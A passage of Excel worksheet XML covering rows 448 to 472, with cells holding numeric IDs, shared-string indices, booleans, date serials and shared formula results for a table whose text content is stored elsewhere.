      </c>
      <c r="N448" s="1" t="s">
        <v>199</v>
      </c>
      <c r="O448" s="1" t="s">
        <v>2185</v>
      </c>
      <c r="P448" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q448" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R448" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S448" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="1">
        <v>6098.0</v>
      </c>
      <c r="B449" s="2" t="s">
        <v>2187</v>
      </c>
      <c r="C449" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D449" s="2" t="s">
        <v>2181</v>
      </c>
      <c r="E449" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F449" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G449" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H449" s="4">
        <v>44744.51180555556</v>
      </c>
      <c r="I449" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J449" s="1" t="s">
        <v>2183</v>
      </c>
      <c r="K449" s="2" t="s">
        <v>2184</v>
      </c>
      <c r="L449" s="1">
        <v>4.0</v>
      </c>
      <c r="M449" s="1">
        <v>11.0</v>
      </c>
      <c r="N449" s="1" t="s">
        <v>2188</v>
      </c>
      <c r="O449" s="1" t="s">
        <v>2185</v>
      </c>
      <c r="P449" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q449" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R449" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S449" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="1">
        <v>6099.0</v>
      </c>
      <c r="B450" s="2" t="s">
        <v>2189</v>
      </c>
      <c r="C450" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D450" s="2" t="s">
        <v>2181</v>
      </c>
      <c r="E450" s="2" t="s">
        <v>761</v>
      </c>
      <c r="F450" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G450" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H450" s="1" t="s">
        <v>2190</v>
      </c>
      <c r="I450" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J450" s="1" t="s">
        <v>2183</v>
      </c>
      <c r="K450" s="2" t="s">
        <v>2184</v>
      </c>
      <c r="L450" s="1">
        <v>4.0</v>
      </c>
      <c r="M450" s="1">
        <v>11.0</v>
      </c>
      <c r="N450" s="1" t="s">
        <v>2191</v>
      </c>
      <c r="O450" s="1" t="s">
        <v>2185</v>
      </c>
      <c r="P450" s="1" t="s">
        <v>2192</v>
      </c>
      <c r="Q450" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R450" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S450" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="1">
        <v>6103.0</v>
      </c>
      <c r="B451" s="2" t="s">
        <v>2193</v>
      </c>
      <c r="C451" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D451" s="2" t="s">
        <v>2181</v>
      </c>
      <c r="E451" s="2" t="s">
        <v>761</v>
      </c>
      <c r="F451" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G451" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H451" s="1" t="s">
        <v>2194</v>
      </c>
      <c r="I451" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J451" s="1" t="s">
        <v>2183</v>
      </c>
      <c r="K451" s="2" t="s">
        <v>2184</v>
      </c>
      <c r="L451" s="1">
        <v>4.0</v>
      </c>
      <c r="M451" s="1">
        <v>11.0</v>
      </c>
      <c r="N451" s="1" t="s">
        <v>1629</v>
      </c>
      <c r="O451" s="1" t="s">
        <v>2185</v>
      </c>
      <c r="P451" s="1" t="s">
        <v>1416</v>
      </c>
      <c r="Q451" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R451" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S451" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="1">
        <v>6117.0</v>
      </c>
      <c r="B452" s="2" t="s">
        <v>2195</v>
      </c>
      <c r="C452" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D452" s="2" t="s">
        <v>2196</v>
      </c>
      <c r="E452" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F452" s="1" t="s">
        <v>2032</v>
      </c>
      <c r="G452" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H452" s="4">
        <v>44777.00555555556</v>
      </c>
      <c r="I452" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J452" s="1" t="s">
        <v>2197</v>
      </c>
      <c r="K452" s="2" t="s">
        <v>2198</v>
      </c>
      <c r="L452" s="1">
        <v>9.0</v>
      </c>
      <c r="M452" s="1">
        <v>14.0</v>
      </c>
      <c r="N452" s="1" t="s">
        <v>205</v>
      </c>
      <c r="O452" s="1" t="s">
        <v>2199</v>
      </c>
      <c r="P452" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q452" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R452" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S452" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="1">
        <v>6119.0</v>
      </c>
      <c r="B453" s="2" t="s">
        <v>2200</v>
      </c>
      <c r="C453" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D453" s="2" t="s">
        <v>2201</v>
      </c>
      <c r="E453" s="2" t="s">
        <v>605</v>
      </c>
      <c r="F453" s="1" t="s">
        <v>2202</v>
      </c>
      <c r="G453" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H453" s="4">
        <v>44777.05902777778</v>
      </c>
      <c r="I453" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J453" s="1" t="s">
        <v>2197</v>
      </c>
      <c r="K453" s="2" t="s">
        <v>2198</v>
      </c>
      <c r="L453" s="1">
        <v>9.0</v>
      </c>
      <c r="M453" s="1">
        <v>14.0</v>
      </c>
      <c r="N453" s="1" t="s">
        <v>205</v>
      </c>
      <c r="O453" s="1" t="s">
        <v>2199</v>
      </c>
      <c r="P453" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q453" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R453" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S453" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="1">
        <v>6122.0</v>
      </c>
      <c r="B454" s="2" t="s">
        <v>2203</v>
      </c>
      <c r="C454" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D454" s="2" t="s">
        <v>2204</v>
      </c>
      <c r="E454" s="2" t="s">
        <v>605</v>
      </c>
      <c r="F454" s="1" t="s">
        <v>2205</v>
      </c>
      <c r="G454" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H454" s="4">
        <v>44777.56805555556</v>
      </c>
      <c r="I454" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J454" s="1" t="s">
        <v>2197</v>
      </c>
      <c r="K454" s="2" t="s">
        <v>2198</v>
      </c>
      <c r="L454" s="1">
        <v>9.0</v>
      </c>
      <c r="M454" s="1">
        <v>14.0</v>
      </c>
      <c r="N454" s="1" t="s">
        <v>2206</v>
      </c>
      <c r="O454" s="1" t="s">
        <v>2199</v>
      </c>
      <c r="P454" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q454" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R454" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S454" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="1">
        <v>6126.0</v>
      </c>
      <c r="B455" s="2" t="s">
        <v>2207</v>
      </c>
      <c r="C455" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D455" s="2" t="s">
        <v>2204</v>
      </c>
      <c r="E455" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F455" s="1" t="s">
        <v>2208</v>
      </c>
      <c r="G455" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H455" s="1" t="s">
        <v>2209</v>
      </c>
      <c r="I455" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J455" s="1" t="s">
        <v>2197</v>
      </c>
      <c r="K455" s="2" t="s">
        <v>2198</v>
      </c>
      <c r="L455" s="1">
        <v>9.0</v>
      </c>
      <c r="M455" s="1">
        <v>14.0</v>
      </c>
      <c r="N455" s="1" t="s">
        <v>2210</v>
      </c>
      <c r="O455" s="1" t="s">
        <v>2199</v>
      </c>
      <c r="P455" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q455" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R455" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S455" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="1">
        <v>6147.0</v>
      </c>
      <c r="B456" s="2" t="s">
        <v>2211</v>
      </c>
      <c r="C456" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D456" s="2" t="s">
        <v>2201</v>
      </c>
      <c r="E456" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F456" s="1" t="s">
        <v>2202</v>
      </c>
      <c r="G456" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H456" s="4">
        <v>44777.87430555555</v>
      </c>
      <c r="I456" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J456" s="1" t="s">
        <v>2212</v>
      </c>
      <c r="K456" s="2" t="s">
        <v>2213</v>
      </c>
      <c r="L456" s="1">
        <v>11.0</v>
      </c>
      <c r="M456" s="1">
        <v>22.0</v>
      </c>
      <c r="N456" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O456" s="1" t="s">
        <v>2214</v>
      </c>
      <c r="P456" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q456" s="1">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="R456" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S456" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="1">
        <v>6148.0</v>
      </c>
      <c r="B457" s="2" t="s">
        <v>2215</v>
      </c>
      <c r="C457" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D457" s="2" t="s">
        <v>2201</v>
      </c>
      <c r="E457" s="2" t="s">
        <v>940</v>
      </c>
      <c r="F457" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G457" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H457" s="4">
        <v>44777.895833333336</v>
      </c>
      <c r="I457" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J457" s="1" t="s">
        <v>2212</v>
      </c>
      <c r="K457" s="2" t="s">
        <v>2213</v>
      </c>
      <c r="L457" s="1">
        <v>11.0</v>
      </c>
      <c r="M457" s="1">
        <v>22.0</v>
      </c>
      <c r="N457" s="1" t="s">
        <v>1876</v>
      </c>
      <c r="O457" s="1" t="s">
        <v>2214</v>
      </c>
      <c r="P457" s="1" t="s">
        <v>2216</v>
      </c>
      <c r="Q457" s="1">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="R457" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S457" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="1">
        <v>6149.0</v>
      </c>
      <c r="B458" s="2" t="s">
        <v>2217</v>
      </c>
      <c r="C458" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D458" s="2" t="s">
        <v>2201</v>
      </c>
      <c r="E458" s="2" t="s">
        <v>940</v>
      </c>
      <c r="F458" s="1" t="s">
        <v>371</v>
      </c>
      <c r="G458" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H458" s="4">
        <v>44777.89722222222</v>
      </c>
      <c r="I458" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J458" s="1" t="s">
        <v>2212</v>
      </c>
      <c r="K458" s="2" t="s">
        <v>2213</v>
      </c>
      <c r="L458" s="1">
        <v>11.0</v>
      </c>
      <c r="M458" s="1">
        <v>22.0</v>
      </c>
      <c r="N458" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O458" s="1" t="s">
        <v>2214</v>
      </c>
      <c r="P458" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q458" s="1">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="R458" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S458" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="1">
        <v>6150.0</v>
      </c>
      <c r="B459" s="2" t="s">
        <v>2218</v>
      </c>
      <c r="C459" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D459" s="2" t="s">
        <v>2201</v>
      </c>
      <c r="E459" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F459" s="1" t="s">
        <v>2032</v>
      </c>
      <c r="G459" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H459" s="4">
        <v>44777.93402777778</v>
      </c>
      <c r="I459" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J459" s="1" t="s">
        <v>2212</v>
      </c>
      <c r="K459" s="2" t="s">
        <v>2213</v>
      </c>
      <c r="L459" s="1">
        <v>11.0</v>
      </c>
      <c r="M459" s="1">
        <v>22.0</v>
      </c>
      <c r="N459" s="1" t="s">
        <v>1497</v>
      </c>
      <c r="O459" s="1" t="s">
        <v>2214</v>
      </c>
      <c r="P459" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q459" s="1">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="R459" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S459" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="1">
        <v>6151.0</v>
      </c>
      <c r="B460" s="2" t="s">
        <v>2219</v>
      </c>
      <c r="C460" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D460" s="2" t="s">
        <v>2201</v>
      </c>
      <c r="E460" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F460" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G460" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H460" s="4">
        <v>44777.941666666666</v>
      </c>
      <c r="I460" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J460" s="1" t="s">
        <v>2212</v>
      </c>
      <c r="K460" s="2" t="s">
        <v>2213</v>
      </c>
      <c r="L460" s="1">
        <v>11.0</v>
      </c>
      <c r="M460" s="1">
        <v>22.0</v>
      </c>
      <c r="N460" s="1" t="s">
        <v>28</v>
      </c>
      <c r="O460" s="1" t="s">
        <v>2214</v>
      </c>
      <c r="P460" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q460" s="1">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="R460" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S460" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="1">
        <v>6154.0</v>
      </c>
      <c r="B461" s="2" t="s">
        <v>2220</v>
      </c>
      <c r="C461" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D461" s="2" t="s">
        <v>2201</v>
      </c>
      <c r="E461" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F461" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G461" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H461" s="4">
        <v>44808.055555555555</v>
      </c>
      <c r="I461" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J461" s="1" t="s">
        <v>2212</v>
      </c>
      <c r="K461" s="2" t="s">
        <v>2213</v>
      </c>
      <c r="L461" s="1">
        <v>11.0</v>
      </c>
      <c r="M461" s="1">
        <v>22.0</v>
      </c>
      <c r="N461" s="1" t="s">
        <v>681</v>
      </c>
      <c r="O461" s="1" t="s">
        <v>2214</v>
      </c>
      <c r="P461" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q461" s="1">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="R461" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S461" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="1">
        <v>6155.0</v>
      </c>
      <c r="B462" s="2" t="s">
        <v>2221</v>
      </c>
      <c r="C462" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D462" s="2" t="s">
        <v>2201</v>
      </c>
      <c r="E462" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F462" s="1" t="s">
        <v>2202</v>
      </c>
      <c r="G462" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H462" s="4">
        <v>44808.07986111111</v>
      </c>
      <c r="I462" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J462" s="1" t="s">
        <v>2212</v>
      </c>
      <c r="K462" s="2" t="s">
        <v>2213</v>
      </c>
      <c r="L462" s="1">
        <v>11.0</v>
      </c>
      <c r="M462" s="1">
        <v>22.0</v>
      </c>
      <c r="N462" s="1" t="s">
        <v>2222</v>
      </c>
      <c r="O462" s="1" t="s">
        <v>2214</v>
      </c>
      <c r="P462" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q462" s="1">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="R462" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S462" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="1">
        <v>6156.0</v>
      </c>
      <c r="B463" s="2" t="s">
        <v>2223</v>
      </c>
      <c r="C463" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D463" s="2" t="s">
        <v>2201</v>
      </c>
      <c r="E463" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F463" s="1" t="s">
        <v>2202</v>
      </c>
      <c r="G463" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H463" s="4">
        <v>44808.080555555556</v>
      </c>
      <c r="I463" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J463" s="1" t="s">
        <v>2212</v>
      </c>
      <c r="K463" s="2" t="s">
        <v>2213</v>
      </c>
      <c r="L463" s="1">
        <v>11.0</v>
      </c>
      <c r="M463" s="1">
        <v>22.0</v>
      </c>
      <c r="N463" s="1" t="s">
        <v>205</v>
      </c>
      <c r="O463" s="1" t="s">
        <v>2214</v>
      </c>
      <c r="P463" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q463" s="1">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="R463" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S463" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="1">
        <v>6157.0</v>
      </c>
      <c r="B464" s="2" t="s">
        <v>2224</v>
      </c>
      <c r="C464" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D464" s="2" t="s">
        <v>2201</v>
      </c>
      <c r="E464" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F464" s="1" t="s">
        <v>2225</v>
      </c>
      <c r="G464" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H464" s="4">
        <v>44808.208333333336</v>
      </c>
      <c r="I464" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J464" s="1" t="s">
        <v>2212</v>
      </c>
      <c r="K464" s="2" t="s">
        <v>2213</v>
      </c>
      <c r="L464" s="1">
        <v>11.0</v>
      </c>
      <c r="M464" s="1">
        <v>22.0</v>
      </c>
      <c r="N464" s="1" t="s">
        <v>726</v>
      </c>
      <c r="O464" s="1" t="s">
        <v>2214</v>
      </c>
      <c r="P464" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q464" s="1">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="R464" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S464" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="1">
        <v>6158.0</v>
      </c>
      <c r="B465" s="2" t="s">
        <v>2226</v>
      </c>
      <c r="C465" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D465" s="2" t="s">
        <v>2201</v>
      </c>
      <c r="E465" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F465" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G465" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H465" s="4">
        <v>44808.24166666667</v>
      </c>
      <c r="I465" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J465" s="1" t="s">
        <v>2212</v>
      </c>
      <c r="K465" s="2" t="s">
        <v>2213</v>
      </c>
      <c r="L465" s="1">
        <v>11.0</v>
      </c>
      <c r="M465" s="1">
        <v>22.0</v>
      </c>
      <c r="N465" s="1" t="s">
        <v>2227</v>
      </c>
      <c r="O465" s="1" t="s">
        <v>2214</v>
      </c>
      <c r="P465" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q465" s="1">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="R465" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S465" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="1">
        <v>6159.0</v>
      </c>
      <c r="B466" s="2" t="s">
        <v>2228</v>
      </c>
      <c r="C466" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D466" s="2" t="s">
        <v>2201</v>
      </c>
      <c r="E466" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F466" s="1" t="s">
        <v>2229</v>
      </c>
      <c r="G466" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H466" s="4">
        <v>44808.566666666666</v>
      </c>
      <c r="I466" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J466" s="1" t="s">
        <v>2212</v>
      </c>
      <c r="K466" s="2" t="s">
        <v>2213</v>
      </c>
      <c r="L466" s="1">
        <v>11.0</v>
      </c>
      <c r="M466" s="1">
        <v>22.0</v>
      </c>
      <c r="N466" s="1" t="s">
        <v>2230</v>
      </c>
      <c r="O466" s="1" t="s">
        <v>2214</v>
      </c>
      <c r="P466" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q466" s="1">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="R466" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S466" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="1">
        <v>6223.0</v>
      </c>
      <c r="B467" s="2" t="s">
        <v>2231</v>
      </c>
      <c r="C467" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D467" s="2" t="s">
        <v>2232</v>
      </c>
      <c r="E467" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F467" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G467" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H467" s="4">
        <v>44411.697222222225</v>
      </c>
      <c r="I467" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J467" s="1" t="s">
        <v>2233</v>
      </c>
      <c r="K467" s="2" t="s">
        <v>2234</v>
      </c>
      <c r="L467" s="1">
        <v>1.0</v>
      </c>
      <c r="M467" s="1">
        <v>1.0</v>
      </c>
      <c r="N467" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O467" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P467" s="1" t="s">
        <v>393</v>
      </c>
      <c r="Q467" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R467" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S467" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="1">
        <v>6230.0</v>
      </c>
      <c r="B468" s="2" t="s">
        <v>2235</v>
      </c>
      <c r="C468" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D468" s="2" t="s">
        <v>2236</v>
      </c>
      <c r="E468" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F468" s="1" t="s">
        <v>1284</v>
      </c>
      <c r="G468" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H468" s="4">
        <v>44811.86736111111</v>
      </c>
      <c r="I468" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J468" s="1" t="s">
        <v>2237</v>
      </c>
      <c r="K468" s="2" t="s">
        <v>2238</v>
      </c>
      <c r="L468" s="1">
        <v>1.0</v>
      </c>
      <c r="M468" s="1">
        <v>1.0</v>
      </c>
      <c r="N468" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O468" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P468" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q468" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R468" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S468" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="1">
        <v>6395.0</v>
      </c>
      <c r="B469" s="2" t="s">
        <v>2239</v>
      </c>
      <c r="C469" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D469" s="2" t="s">
        <v>2240</v>
      </c>
      <c r="E469" s="2" t="s">
        <v>2241</v>
      </c>
      <c r="F469" s="1" t="s">
        <v>2242</v>
      </c>
      <c r="G469" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H469" s="1" t="s">
        <v>2243</v>
      </c>
      <c r="I469" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J469" s="1" t="s">
        <v>2244</v>
      </c>
      <c r="K469" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="L469" s="1">
        <v>8.0</v>
      </c>
      <c r="M469" s="1">
        <v>8.0</v>
      </c>
      <c r="N469" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O469" s="1" t="s">
        <v>2246</v>
      </c>
      <c r="P469" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q469" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R469" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S469" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="1">
        <v>6396.0</v>
      </c>
      <c r="B470" s="2" t="s">
        <v>2247</v>
      </c>
      <c r="C470" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D470" s="2" t="s">
        <v>2240</v>
      </c>
      <c r="E470" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F470" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G470" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H470" s="1" t="s">
        <v>2248</v>
      </c>
      <c r="I470" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J470" s="1" t="s">
        <v>2244</v>
      </c>
      <c r="K470" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="L470" s="1">
        <v>8.0</v>
      </c>
      <c r="M470" s="1">
        <v>8.0</v>
      </c>
      <c r="N470" s="1" t="s">
        <v>1430</v>
      </c>
      <c r="O470" s="1" t="s">
        <v>2246</v>
      </c>
      <c r="P470" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q470" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R470" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S470" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="1">
        <v>6397.0</v>
      </c>
      <c r="B471" s="2" t="s">
        <v>2249</v>
      </c>
      <c r="C471" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D471" s="2" t="s">
        <v>2250</v>
      </c>
      <c r="E471" s="2" t="s">
        <v>2251</v>
      </c>
      <c r="F471" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G471" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H471" s="1" t="s">
        <v>2252</v>
      </c>
      <c r="I471" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J471" s="1" t="s">
        <v>2244</v>
      </c>
      <c r="K471" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="L471" s="1">
        <v>8.0</v>
      </c>
      <c r="M471" s="1">
        <v>8.0</v>
      </c>
      <c r="N471" s="1" t="s">
        <v>2253</v>
      </c>
      <c r="O471" s="1" t="s">
        <v>2246</v>
      </c>
      <c r="P471" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q471" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R471" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S471" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="1">
        <v>6398.0</v>
      </c>
      <c r="B472" s="2" t="s">
        <v>2254</v>
      </c>
